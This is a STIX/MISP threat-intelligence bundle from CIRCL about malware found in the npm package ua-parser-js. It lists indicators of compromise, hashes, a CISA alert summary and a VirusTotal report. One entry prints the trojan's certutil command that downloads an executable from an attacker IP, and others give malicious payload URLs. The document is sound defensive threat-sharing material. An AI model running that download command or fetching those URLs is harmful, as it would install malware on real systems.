|
{
|
||
|
"type": "bundle",
|
||
|
"id": "bundle--ad7665ec-fef2-44eb-a019-b1b25a8aec05",
|
||
|
"objects": [
|
||
|
{
|
||
|
"type": "identity",
|
||
|
"spec_version": "2.1",
|
||
|
"id": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
||
|
"created": "2021-10-24T08:25:55.000Z",
|
||
|
"modified": "2021-10-24T08:25:55.000Z",
|
||
|
"name": "CIRCL",
|
||
|
"identity_class": "organization"
|
||
|
},
|
||
|
{
|
||
|
"type": "report",
|
||
|
"spec_version": "2.1",
|
||
|
"id": "report--ad7665ec-fef2-44eb-a019-b1b25a8aec05",
|
||
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
||
|
"created": "2021-10-24T08:25:55.000Z",
|
||
|
"modified": "2021-10-24T08:25:55.000Z",
|
||
|
"name": "Malware Discovered in Popular NPM Package, ua-parser-js",
|
||
|
"published": "2021-10-24T08:26:47Z",
|
||
|
"object_refs": [
|
||
|
"observed-data--e9d82a66-46bd-4f0e-aeac-17349abddeb0",
|
||
|
"url--e9d82a66-46bd-4f0e-aeac-17349abddeb0",
|
||
|
"observed-data--508a294c-876e-4a8a-a3bd-a3de15e10325",
|
||
|
"url--508a294c-876e-4a8a-a3bd-a3de15e10325",
|
||
|
"observed-data--f51805cb-5fec-4ce1-b7ae-1d1206720542",
|
||
|
"url--f51805cb-5fec-4ce1-b7ae-1d1206720542",
|
||
|
"indicator--b6541760-d7e6-432b-9715-eae2ce06ad83",
|
||
|
"indicator--3e4cc221-dbb9-4e64-9523-800d8af8f972",
|
||
|
"indicator--1b1a28a9-2b47-43a3-92b9-c9353497f429",
|
||
|
"indicator--9163b990-5b87-413c-a8e7-f616b908157f",
|
||
|
"x-misp-object--30866961-7eda-4bb7-a5e8-cb0bfeebce4c",
|
||
|
"x-misp-object--459c41f0-70a7-44ce-b9b0-7f1fc7d2903e",
|
||
|
"x-misp-object--57d3ed7e-eda9-4e5e-b7ac-a813415e9006",
|
||
|
"indicator--116cfff2-f422-4b59-a5aa-630fc443be4b",
|
||
|
"indicator--e1f2c049-da88-4238-9dde-4134209c1364",
|
||
|
"indicator--3f6f1f5f-b847-4fd1-be30-6f43601c26cd",
|
||
|
"indicator--bb6df499-a3fc-4a79-b7f2-5dfc4a277c2b",
|
||
|
"x-misp-object--a9b50a3c-793f-4541-a123-60716668e2d5",
|
||
|
"relationship--1b221186-0b2e-43f8-ad16-b43e8dcb3e15",
|
||
|
"relationship--67829f87-338d-4977-a756-a1f6a51c33cb",
|
||
|
"relationship--b4d636f2-5c71-4b13-bc2f-e491e0321e2f",
|
||
|
"relationship--5a5b4705-da6a-45f8-9644-dfed1924f3ae",
|
||
|
"relationship--e09215ed-b2e0-4570-b605-5b8d0d47567f",
|
||
|
"relationship--d3508c75-80de-4c93-8208-8184bbc3537a",
|
||
|
"relationship--805d60d8-89a1-47d8-8240-5333b49f091d",
|
||
|
"relationship--c3be4870-b16b-43ae-8efa-63c71f159530",
|
||
|
"relationship--b5470b30-08ef-4e40-a3c8-dbb20071e107",
|
||
|
"relationship--2cdcf379-3e29-4acb-953e-c386a6d338fe",
|
||
|
"relationship--adec1637-7349-426a-9e8b-e324482c3a29",
|
||
|
"relationship--1d73293e-adaf-4b1e-afd5-ed5d3d0fe188"
|
||
|
],
|
||
|
"labels": [
|
||
|
"Threat-Report",
|
||
|
"misp:tool=\"MISP-STIX-Converter\"",
|
||
|
"type:OSINT",
|
||
|
"osint:lifetime=\"perpetual\"",
|
||
|
"osint:certainty=\"50\"",
|
||
|
"misp-galaxy:mitre-attack-pattern=\"Compromise Software Supply Chain - T1195.002\"",
|
||
|
"misp-galaxy:mitre-attack-pattern=\"Compromise Software Dependencies and Development Tools - T1195.001\""
|
||
|
],
|
||
|
"object_marking_refs": [
|
||
|
"marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
|
||
|
]
|
||
|
},
|
||
|
{
|
||
|
"type": "observed-data",
|
||
|
"spec_version": "2.1",
|
||
|
"id": "observed-data--e9d82a66-46bd-4f0e-aeac-17349abddeb0",
|
||
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
||
|
"created": "2021-10-24T07:52:52.000Z",
|
||
|
"modified": "2021-10-24T07:52:52.000Z",
|
||
|
"first_observed": "2021-10-24T07:52:52Z",
|
||
|
"last_observed": "2021-10-24T07:52:52Z",
|
||
|
"number_observed": 1,
|
||
|
"object_refs": [
|
||
|
"url--e9d82a66-46bd-4f0e-aeac-17349abddeb0"
|
||
|
],
|
||
|
"labels": [
|
||
|
"misp:type=\"link\"",
|
||
|
"misp:category=\"External analysis\""
|
||
|
]
|
||
|
},
|
||
|
{
|
||
|
"type": "url",
|
||
|
"spec_version": "2.1",
|
||
|
"id": "url--e9d82a66-46bd-4f0e-aeac-17349abddeb0",
|
||
|
"value": "https://github.com/advisories/GHSA-pjwm-rvh2-c87w"
|
||
|
},
|
||
|
{
|
||
|
"type": "observed-data",
|
||
|
"spec_version": "2.1",
|
||
|
"id": "observed-data--508a294c-876e-4a8a-a3bd-a3de15e10325",
|
||
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
||
|
"created": "2021-10-24T07:54:51.000Z",
|
||
|
"modified": "2021-10-24T07:54:51.000Z",
|
||
|
"first_observed": "2021-10-24T07:54:51Z",
|
||
|
"last_observed": "2021-10-24T07:54:51Z",
|
||
|
"number_observed": 1,
|
||
|
"object_refs": [
|
||
|
"url--508a294c-876e-4a8a-a3bd-a3de15e10325"
|
||
|
],
|
||
|
"labels": [
|
||
|
"misp:type=\"link\"",
|
||
|
"misp:category=\"External analysis\""
|
||
|
]
|
||
|
},
|
||
|
{
|
||
|
"type": "url",
|
||
|
"spec_version": "2.1",
|
||
|
"id": "url--508a294c-876e-4a8a-a3bd-a3de15e10325",
|
||
|
"value": "https://github.com/faisalman/ua-parser-js/issues/536"
|
||
|
},
|
||
|
{
|
||
|
"type": "observed-data",
|
||
|
"spec_version": "2.1",
|
||
|
"id": "observed-data--f51805cb-5fec-4ce1-b7ae-1d1206720542",
|
||
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
||
|
"created": "2021-10-24T07:58:30.000Z",
|
||
|
"modified": "2021-10-24T07:58:30.000Z",
|
||
|
"first_observed": "2021-10-24T07:58:30Z",
|
||
|
"last_observed": "2021-10-24T07:58:30Z",
|
||
|
"number_observed": 1,
|
||
|
"object_refs": [
|
||
|
"url--f51805cb-5fec-4ce1-b7ae-1d1206720542"
|
||
|
],
|
||
|
"labels": [
|
||
|
"misp:type=\"url\"",
|
||
|
"misp:category=\"Payload delivery\""
|
||
|
]
|
||
|
},
|
||
|
{
|
||
|
"type": "url",
|
||
|
"spec_version": "2.1",
|
||
|
"id": "url--f51805cb-5fec-4ce1-b7ae-1d1206720542",
|
||
|
"value": "http://159.148.186.228/download/jsextension.exe"
|
||
|
},
|
||
|
{
|
||
|
"type": "indicator",
|
||
|
"spec_version": "2.1",
|
||
|
"id": "indicator--b6541760-d7e6-432b-9715-eae2ce06ad83",
|
||
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
||
|
"created": "2021-10-24T07:59:03.000Z",
|
||
|
"modified": "2021-10-24T07:59:03.000Z",
|
||
|
"pattern": "[url:value = 'https://citationsherbe.at/sdd.dll']",
|
||
|
"pattern_type": "stix",
|
||
|
"pattern_version": "2.1",
|
||
|
"valid_from": "2021-10-24T07:59:03Z",
|
||
|
"kill_chain_phases": [
|
||
|
{
|
||
|
"kill_chain_name": "misp-category",
|
||
|
"phase_name": "Payload delivery"
|
||
|
}
|
||
|
],
|
||
|
"labels": [
|
||
|
"misp:type=\"url\"",
|
||
|
"misp:category=\"Payload delivery\"",
|
||
|
"misp:to_ids=\"True\""
|
||
|
]
|
||
|
},
|
||
|
{
|
||
|
"type": "indicator",
|
||
|
"spec_version": "2.1",
|
||
|
"id": "indicator--3e4cc221-dbb9-4e64-9523-800d8af8f972",
|
||
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
||
|
"created": "2021-10-24T07:59:45.000Z",
|
||
|
"modified": "2021-10-24T07:59:45.000Z",
|
||
|
"pattern": "[domain-name:value = 'citationsherbe.at']",
|
||
|
"pattern_type": "stix",
|
||
|
"pattern_version": "2.1",
|
||
|
"valid_from": "2021-10-24T07:59:45Z",
|
||
|
"kill_chain_phases": [
|
||
|
{
|
||
|
"kill_chain_name": "misp-category",
|
||
|
"phase_name": "Network activity"
|
||
|
}
|
||
|
],
|
||
|
"labels": [
|
||
|
"misp:type=\"domain\"",
|
||
|
"misp:category=\"Network activity\"",
|
||
|
"misp:to_ids=\"True\""
|
||
|
]
|
||
|
},
|
||
|
{
|
||
|
"type": "indicator",
|
||
|
"spec_version": "2.1",
|
||
|
"id": "indicator--1b1a28a9-2b47-43a3-92b9-c9353497f429",
|
||
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
||
|
"created": "2021-10-24T08:00:44.000Z",
|
||
|
"modified": "2021-10-24T08:00:44.000Z",
|
||
|
"description": "sdd.dll",
|
||
|
"pattern": "[file:hashes.SHA256 = '2a3acdcd76575762b18c18c644a745125f55ce121f742d2aad962521bc7f25fd']",
|
||
|
"pattern_type": "stix",
|
||
|
"pattern_version": "2.1",
|
||
|
"valid_from": "2021-10-24T08:00:44Z",
|
||
|
"kill_chain_phases": [
|
||
|
{
|
||
|
"kill_chain_name": "misp-category",
|
||
|
"phase_name": "Artifacts dropped"
|
||
|
}
|
||
|
],
|
||
|
"labels": [
|
||
|
"misp:type=\"sha256\"",
|
||
|
"misp:category=\"Artifacts dropped\"",
|
||
|
"misp:to_ids=\"True\""
|
||
|
]
|
||
|
},
|
||
|
{
|
||
|
"type": "indicator",
|
||
|
"spec_version": "2.1",
|
||
|
"id": "indicator--9163b990-5b87-413c-a8e7-f616b908157f",
|
||
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
||
|
"created": "2021-10-24T08:01:14.000Z",
|
||
|
"modified": "2021-10-24T08:01:14.000Z",
|
||
|
"description": "jsextension.exe",
|
||
|
"pattern": "[file:hashes.SHA256 = '47dded0efc230c3536f4db1e2e476afd3eda8d8ea0537db69d432322cdbac9ca']",
|
||
|
"pattern_type": "stix",
|
||
|
"pattern_version": "2.1",
|
||
|
"valid_from": "2021-10-24T08:01:14Z",
|
||
|
"kill_chain_phases": [
|
||
|
{
|
||
|
"kill_chain_name": "misp-category",
|
||
|
"phase_name": "Artifacts dropped"
|
||
|
}
|
||
|
],
|
||
|
"labels": [
|
||
|
"misp:type=\"sha256\"",
|
||
|
"misp:category=\"Artifacts dropped\"",
|
||
|
"misp:to_ids=\"True\""
|
||
|
]
|
||
|
},
|
||
|
{
|
||
|
"type": "x-misp-object",
|
||
|
"spec_version": "2.1",
|
||
|
"id": "x-misp-object--30866961-7eda-4bb7-a5e8-cb0bfeebce4c",
|
||
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
||
|
"created": "2021-10-24T08:25:55.000Z",
|
||
|
"modified": "2021-10-24T08:25:55.000Z",
|
||
|
"labels": [
|
||
|
"misp:name=\"report\"",
|
||
|
"misp:meta-category=\"misc\""
|
||
|
],
|
||
|
"x_misp_attributes": [
|
||
|
{
|
||
|
"type": "link",
|
||
|
"object_relation": "link",
|
||
|
"value": "https://us-cert.cisa.gov/ncas/current-activity/2021/10/22/malware-discovered-popular-npm-package-ua-parser-js",
|
||
|
"category": "External analysis",
|
||
|
"uuid": "10d9ac50-3208-4cff-9d07-c2bec1c192c8"
|
||
|
},
|
||
|
{
|
||
|
"type": "text",
|
||
|
"object_relation": "summary",
|
||
|
"value": "Versions of a popular NPM package named ua-parser-js were found to contain malicious code. ua-parser-js is used in apps and websites to discover the type of device or browser a person is using from User-Agent data. A computer or device with the affected software installed or running could allow a remote attacker to obtain sensitive information or take control of the system. \r\n\r\nCISA urges users and administrators using compromised ua-parser-js versions 0.7.29, 0.8.0, and 1.0.0 to update to the respective patched versions: 0.7.30, 0.8.1, 1.0.1 \r\n\r\nFor more information, see Embedded malware in ua-parser-js.",
|
||
|
"category": "Other",
|
||
|
"uuid": "5faebe54-7492-4f23-99f8-edf5e24e5424"
|
||
|
},
|
||
|
{
|
||
|
"type": "text",
|
||
|
"object_relation": "type",
|
||
|
"value": "Alert",
|
||
|
"category": "Other",
|
||
|
"uuid": "0e1e4035-31a1-4df6-8aa9-2a6208f7f601"
|
||
|
}
|
||
|
],
|
||
|
"x_misp_meta_category": "misc",
|
||
|
"x_misp_name": "report"
|
||
|
},
|
||
|
{
|
||
|
"type": "x-misp-object",
|
||
|
"spec_version": "2.1",
|
||
|
"id": "x-misp-object--459c41f0-70a7-44ce-b9b0-7f1fc7d2903e",
|
||
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
||
|
"created": "2021-10-24T08:23:57.000Z",
|
||
|
"modified": "2021-10-24T08:23:57.000Z",
|
||
|
"labels": [
|
||
|
"misp:name=\"command-line\"",
|
||
|
"misp:meta-category=\"misc\""
|
||
|
],
|
||
|
"x_misp_attributes": [
|
||
|
{
|
||
|
"type": "text",
|
||
|
"object_relation": "value",
|
||
|
"value": "certutil -rulcache -f http://159.148.186.228/download/jsextension.exe jsextension.exe",
|
||
|
"category": "Other",
|
||
|
"uuid": "974258e7-2e79-413c-9be8-08698653b87b"
|
||
|
},
|
||
|
{
|
||
|
"type": "text",
|
||
|
"object_relation": "description",
|
||
|
"value": "The trojan tries to execute this command in cmd",
|
||
|
"category": "Other",
|
||
|
"uuid": "e3df3b20-a215-40d4-ae1a-a9ed768de240"
|
||
|
}
|
||
|
],
|
||
|
"x_misp_meta_category": "misc",
|
||
|
"x_misp_name": "command-line"
|
||
|
},
|
||
|
{
|
||
|
"type": "x-misp-object",
|
||
|
"spec_version": "2.1",
|
||
|
"id": "x-misp-object--57d3ed7e-eda9-4e5e-b7ac-a813415e9006",
|
||
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
||
|
"created": "2021-10-24T08:11:49.000Z",
|
||
|
"modified": "2021-10-24T08:11:49.000Z",
|
||
|
"labels": [
|
||
|
"misp:name=\"command-line\"",
|
||
|
"misp:meta-category=\"misc\"",
|
||
|
"cycat:scope=\"detection\""
|
||
|
],
|
||
|
"x_misp_attributes": [
|
||
|
{
|
||
|
"type": "text",
|
||
|
"object_relation": "value",
|
||
|
"value": "npm show ua-parser-js time",
|
||
|
"category": "Other",
|
||
|
"uuid": "4834122d-b43b-4b8d-a9d1-3085611ebaec"
|
||
|
},
|
||
|
{
|
||
|
"type": "text",
|
||
|
"object_relation": "description",
|
||
|
"value": "To check the time when the package was installed",
|
||
|
"category": "Other",
|
||
|
"uuid": "542061ee-8993-44ef-8261-f27f25dc9067"
|
||
|
}
|
||
|
],
|
||
|
"x_misp_meta_category": "misc",
|
||
|
"x_misp_name": "command-line"
|
||
|
},
|
||
|
{
|
||
|
"type": "indicator",
|
||
|
"spec_version": "2.1",
|
||
|
"id": "indicator--116cfff2-f422-4b59-a5aa-630fc443be4b",
|
||
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
||
|
"created": "2021-10-24T08:21:22.000Z",
|
||
|
"modified": "2021-10-24T08:21:22.000Z",
|
||
|
"pattern": "[domain-name:value = 'citationsherbe.at' AND domain-name:resolves_to_refs[*].value = '95.213.165.20']",
|
||
|
"pattern_type": "stix",
|
||
|
"pattern_version": "2.1",
|
||
|
"valid_from": "2021-10-24T08:21:22Z",
|
||
|
"kill_chain_phases": [
|
||
|
{
|
||
|
"kill_chain_name": "misp-category",
|
||
|
"phase_name": "network"
|
||
|
}
|
||
|
],
|
||
|
"labels": [
|
||
|
"misp:name=\"domain-ip\"",
|
||
|
"misp:meta-category=\"network\"",
|
||
|
"misp:to_ids=\"True\""
|
||
|
]
|
||
|
},
|
||
|
{
|
||
|
"type": "indicator",
|
||
|
"spec_version": "2.1",
|
||
|
"id": "indicator--e1f2c049-da88-4238-9dde-4134209c1364",
|
||
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
||
|
"created": "2021-10-24T08:03:02.000Z",
|
||
|
"modified": "2021-10-24T08:03:02.000Z",
|
||
|
"pattern": "[domain-name:resolves_to_refs[*].value = '159.148.186.228']",
|
||
|
"pattern_type": "stix",
|
||
|
"pattern_version": "2.1",
|
||
|
"valid_from": "2021-10-24T08:03:02Z",
|
||
|
"kill_chain_phases": [
|
||
|
{
|
||
|
"kill_chain_name": "misp-category",
|
||
|
"phase_name": "network"
|
||
|
}
|
||
|
],
|
||
|
"labels": [
|
||
|
"misp:name=\"domain-ip\"",
|
||
|
"misp:meta-category=\"network\"",
|
||
|
"misp:to_ids=\"True\""
|
||
|
]
|
||
|
},
|
||
|
{
|
||
|
"type": "indicator",
|
||
|
"spec_version": "2.1",
|
||
|
"id": "indicator--3f6f1f5f-b847-4fd1-be30-6f43601c26cd",
|
||
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
||
|
"created": "2021-10-24T08:21:44.000Z",
|
||
|
"modified": "2021-10-24T08:21:44.000Z",
|
||
|
"description": "Vulnerable npm package UAParser.js - '0.7.29': '2021-10-22T12:15:21.378Z',\r\n'0.7.30': '2021-10-22T16:16:08.807Z',\r\n\r\n'0.8.0': '2021-10-22T12:16:06.877Z',\r\n'0.8.1': '2021-10-22T16:23:53.062Z',\r\n\r\n'1.0.0': '2021-10-22T12:16:19.726Z',\r\n'1.0.1': '2021-10-22T16:26:19.004Z',\r\n",
|
||
|
"pattern": "[file:x_misp_pattern_in_file = 'ua-parser-js']",
|
||
|
"pattern_type": "stix",
|
||
|
"pattern_version": "2.1",
|
||
|
"valid_from": "2021-10-24T08:21:44Z",
|
||
|
"kill_chain_phases": [
|
||
|
{
|
||
|
"kill_chain_name": "misp-category",
|
||
|
"phase_name": "file"
|
||
|
}
|
||
|
],
|
||
|
"labels": [
|
||
|
"misp:name=\"file\"",
|
||
|
"misp:meta-category=\"file\"",
|
||
|
"misp:to_ids=\"True\""
|
||
|
]
|
||
|
},
|
||
|
{
|
||
|
"type": "indicator",
|
||
|
"spec_version": "2.1",
|
||
|
"id": "indicator--bb6df499-a3fc-4a79-b7f2-5dfc4a277c2b",
|
||
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
||
|
"created": "2021-10-24T08:17:31.000Z",
|
||
|
"modified": "2021-10-24T08:17:31.000Z",
|
||
|
"pattern": "[file:hashes.MD5 = 'de8b54a938ac18f15cad804d79a0e19d' AND file:hashes.SHA1 = 'b6004c62e2d9dbad9cfd5f7e18647ac983788766' AND file:hashes.SHA256 = '2a3acdcd76575762b18c18c644a745125f55ce121f742d2aad962521bc7f25fd']",
|
||
|
"pattern_type": "stix",
|
||
|
"pattern_version": "2.1",
|
||
|
"valid_from": "2021-10-24T08:17:31Z",
|
||
|
"kill_chain_phases": [
|
||
|
{
|
||
|
"kill_chain_name": "misp-category",
|
||
|
"phase_name": "file"
|
||
|
}
|
||
|
],
|
||
|
"labels": [
|
||
|
"misp:name=\"file\"",
|
||
|
"misp:meta-category=\"file\"",
|
||
|
"misp:to_ids=\"True\""
|
||
|
]
|
||
|
},
|
||
|
{
|
||
|
"type": "x-misp-object",
|
||
|
"spec_version": "2.1",
|
||
|
"id": "x-misp-object--a9b50a3c-793f-4541-a123-60716668e2d5",
|
||
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
||
|
"created": "2021-10-24T08:22:57.000Z",
|
||
|
"modified": "2021-10-24T08:22:57.000Z",
|
||
|
"labels": [
|
||
|
"misp:name=\"virustotal-report\"",
|
||
|
"misp:meta-category=\"misc\""
|
||
|
],
|
||
|
"x_misp_attributes": [
|
||
|
{
|
||
|
"type": "datetime",
|
||
|
"object_relation": "last-submission",
|
||
|
"value": "2021-10-24T04:03:55+00:00",
|
||
|
"category": "Other",
|
||
|
"comment": "sdd.dll",
|
||
|
"uuid": "a38e6a9c-1573-4b68-b9ee-dfdda8eb57ed"
|
||
|
},
|
||
|
{
|
||
|
"type": "link",
|
||
|
"object_relation": "permalink",
|
||
|
"value": "https://www.virustotal.com/gui/file/2a3acdcd76575762b18c18c644a745125f55ce121f742d2aad962521bc7f25fd/detection/f-2a3acdcd76575762b18c18c644a745125f55ce121f742d2aad962521bc7f25fd-1635048235",
|
||
|
"category": "External analysis",
|
||
|
"comment": "sdd.dll",
|
||
|
"uuid": "37fe948f-89f7-4316-bdf3-c88fdbd16b11"
|
||
|
},
|
||
|
{
|
||
|
"type": "text",
|
||
|
"object_relation": "detection-ratio",
|
||
|
"value": "23/50",
|
||
|
"category": "Artifacts dropped",
|
||
|
"comment": "sdd.dll",
|
||
|
"uuid": "b36b2447-2d9b-4993-b23b-2ff46ad63d7c"
|
||
|
}
|
||
|
],
|
||
|
"x_misp_meta_category": "misc",
|
||
|
"x_misp_name": "virustotal-report"
|
||
|
},
|
||
|
{
|
||
|
"type": "relationship",
|
||
|
"spec_version": "2.1",
|
||
|
"id": "relationship--1b221186-0b2e-43f8-ad16-b43e8dcb3e15",
|
||
|
"created": "2021-10-24T08:25:55.000Z",
|
||
|
"modified": "2021-10-24T08:25:55.000Z",
|
||
|
"relationship_type": "alerts",
|
||
|
"source_ref": "x-misp-object--30866961-7eda-4bb7-a5e8-cb0bfeebce4c",
|
||
|
"target_ref": "indicator--3f6f1f5f-b847-4fd1-be30-6f43601c26cd"
|
||
|
},
|
||
|
{
|
||
|
"type": "relationship",
|
||
|
"spec_version": "2.1",
|
||
|
"id": "relationship--67829f87-338d-4977-a756-a1f6a51c33cb",
|
||
|
"created": "2021-10-24T08:09:17.000Z",
|
||
|
"modified": "2021-10-24T08:09:17.000Z",
|
||
|
"relationship_type": "is-in-relation-with",
|
||
|
"source_ref": "x-misp-object--459c41f0-70a7-44ce-b9b0-7f1fc7d2903e",
|
||
|
"target_ref": "indicator--e1f2c049-da88-4238-9dde-4134209c1364"
|
||
|
},
|
||
|
{
|
||
|
"type": "relationship",
|
||
|
"spec_version": "2.1",
|
||
|
"id": "relationship--b4d636f2-5c71-4b13-bc2f-e491e0321e2f",
|
||
|
"created": "2021-10-24T08:10:03.000Z",
|
||
|
"modified": "2021-10-24T08:10:03.000Z",
|
||
|
"relationship_type": "downloads",
|
||
|
"source_ref": "x-misp-object--459c41f0-70a7-44ce-b9b0-7f1fc7d2903e",
|
||
|
"target_ref": "observed-data--f51805cb-5fec-4ce1-b7ae-1d1206720542"
|
||
|
},
|
||
|
{
|
||
|
"type": "relationship",
|
||
|
"spec_version": "2.1",
|
||
|
"id": "relationship--5a5b4705-da6a-45f8-9644-dfed1924f3ae",
|
||
|
"created": "2021-10-24T08:23:57.000Z",
|
||
|
"modified": "2021-10-24T08:23:57.000Z",
|
||
|
"relationship_type": "related-to",
|
||
|
"source_ref": "x-misp-object--459c41f0-70a7-44ce-b9b0-7f1fc7d2903e",
|
||
|
"target_ref": "indicator--9163b990-5b87-413c-a8e7-f616b908157f"
|
||
|
},
|
||
|
{
|
||
|
"type": "relationship",
|
||
|
"spec_version": "2.1",
|
||
|
"id": "relationship--e09215ed-b2e0-4570-b605-5b8d0d47567f",
|
||
|
"created": "2021-10-24T08:11:49.000Z",
|
||
|
"modified": "2021-10-24T08:11:49.000Z",
|
||
|
"relationship_type": "identifies",
|
||
|
"source_ref": "x-misp-object--57d3ed7e-eda9-4e5e-b7ac-a813415e9006",
|
||
|
"target_ref": "indicator--3f6f1f5f-b847-4fd1-be30-6f43601c26cd"
|
||
|
},
|
||
|
{
|
||
|
"type": "relationship",
|
||
|
"spec_version": "2.1",
|
||
|
"id": "relationship--d3508c75-80de-4c93-8208-8184bbc3537a",
|
||
|
"created": "2021-10-24T08:15:51.000Z",
|
||
|
"modified": "2021-10-24T08:15:51.000Z",
|
||
|
"relationship_type": "is-in-relation-with",
|
||
|
"source_ref": "indicator--116cfff2-f422-4b59-a5aa-630fc443be4b",
|
||
|
"target_ref": "indicator--3e4cc221-dbb9-4e64-9523-800d8af8f972"
|
||
|
},
|
||
|
{
|
||
|
"type": "relationship",
|
||
|
"spec_version": "2.1",
|
||
|
"id": "relationship--805d60d8-89a1-47d8-8240-5333b49f091d",
|
||
|
"created": "2021-10-24T08:21:22.000Z",
|
||
|
"modified": "2021-10-24T08:21:22.000Z",
|
||
|
"relationship_type": "related-to",
|
||
|
"source_ref": "indicator--116cfff2-f422-4b59-a5aa-630fc443be4b",
|
||
|
"target_ref": "indicator--b6541760-d7e6-432b-9715-eae2ce06ad83"
|
||
|
},
|
||
|
{
|
||
|
"type": "relationship",
|
||
|
"spec_version": "2.1",
|
||
|
"id": "relationship--c3be4870-b16b-43ae-8efa-63c71f159530",
|
||
|
"created": "2021-10-24T08:06:58.000Z",
|
||
|
"modified": "2021-10-24T08:06:58.000Z",
|
||
|
"relationship_type": "executes",
|
||
|
"source_ref": "indicator--3f6f1f5f-b847-4fd1-be30-6f43601c26cd",
|
||
|
"target_ref": "x-misp-object--459c41f0-70a7-44ce-b9b0-7f1fc7d2903e"
|
||
|
},
|
||
|
{
|
||
|
"type": "relationship",
|
||
|
"spec_version": "2.1",
|
||
|
"id": "relationship--b5470b30-08ef-4e40-a3c8-dbb20071e107",
|
||
|
"created": "2021-10-24T08:16:24.000Z",
|
||
|
"modified": "2021-10-24T08:16:24.000Z",
|
||
|
"relationship_type": "downloads",
|
||
|
"source_ref": "indicator--3f6f1f5f-b847-4fd1-be30-6f43601c26cd",
|
||
|
"target_ref": "indicator--b6541760-d7e6-432b-9715-eae2ce06ad83"
|
||
|
},
|
||
|
{
|
||
|
"type": "relationship",
|
||
|
"spec_version": "2.1",
|
||
|
"id": "relationship--2cdcf379-3e29-4acb-953e-c386a6d338fe",
|
||
|
"created": "2021-10-24T08:21:44.000Z",
|
||
|
"modified": "2021-10-24T08:21:44.000Z",
|
||
|
"relationship_type": "describes",
|
||
|
"source_ref": "indicator--3f6f1f5f-b847-4fd1-be30-6f43601c26cd",
|
||
|
"target_ref": "observed-data--508a294c-876e-4a8a-a3bd-a3de15e10325"
|
||
|
},
|
||
|
{
|
||
|
"type": "relationship",
|
||
|
"spec_version": "2.1",
|
||
|
"id": "relationship--adec1637-7349-426a-9e8b-e324482c3a29",
|
||
|
"created": "2021-10-24T08:17:32.000Z",
|
||
|
"modified": "2021-10-24T08:17:32.000Z",
|
||
|
"relationship_type": "analysed-with",
|
||
|
"source_ref": "indicator--bb6df499-a3fc-4a79-b7f2-5dfc4a277c2b",
|
||
|
"target_ref": "x-misp-object--a9b50a3c-793f-4541-a123-60716668e2d5"
|
||
|
},
|
||
|
{
|
||
|
"type": "relationship",
|
||
|
"spec_version": "2.1",
|
||
|
"id": "relationship--1d73293e-adaf-4b1e-afd5-ed5d3d0fe188",
|
||
|
"created": "2021-10-24T08:22:57.000Z",
|
||
|
"modified": "2021-10-24T08:22:57.000Z",
|
||
|
"relationship_type": "related-to",
|
||
|
"source_ref": "x-misp-object--a9b50a3c-793f-4541-a123-60716668e2d5",
|
||
|
"target_ref": "indicator--b6541760-d7e6-432b-9715-eae2ce06ad83"
|
||
|
},
|
||
|
{
|
||
|
"type": "marking-definition",
|
||
|
"spec_version": "2.1",
|
||
|
"id": "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9",
|
||
|
"created": "2017-01-20T00:00:00.000Z",
|
||
|
"definition_type": "tlp",
|
||
|
"name": "TLP:WHITE",
|
||
|
"definition": {
|
||
|
"tlp": "white"
|
||
|
}
|
||
|
}
|
||
|
]
|
||
|
}
|